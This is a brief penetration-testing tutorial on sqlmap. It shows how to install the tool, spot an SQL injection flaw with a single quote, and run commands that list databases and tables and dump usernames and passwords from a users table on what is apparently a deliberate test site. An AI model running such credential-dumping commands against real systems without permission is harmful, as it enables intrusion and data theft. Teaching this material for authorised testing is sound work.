
SQLMAP


Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

https://github.com/sqlmapproject/sqlmap 

Installation

To install sqlmap, we can pull it from the GitHub link above or use the command below:

  •  apt-get install sqlmap 

It comes installed by default in Kali Linux.

Using sqlmap to exploit a SQLi flaw

       1. First we need to find a SQLi-vulnerable parameter in a web app.

           testphp.vulnweb.com/listproducts.php?cat=2' 

           Adding a single quote showed that this site's cat parameter is vulnerable.

       2.  We can launch sqlmap to dump databases, tables, columns and data from the vulnerable site.

            Note: Using sqlmap for exploitation without proper permission is illegal.

            -u for the URL, -p for the parameter to test

            --dbs to get databases

            --tables to get tables 

            --columns to get columns 

Sqlmap may take a long time, as it tries many SQLi techniques depending on the target SQL server (MySQL, MSSQL, Oracle, etc.).

Once we have the database name, we can fetch its tables and columns:

  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -D acuart --tables 

Let's dump the user and pass info from the users table:

  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -D acuart -T users -C uname,pass --dump 

In the same way, sqlmap can also be used to exploit blind SQLi vulnerabilities.
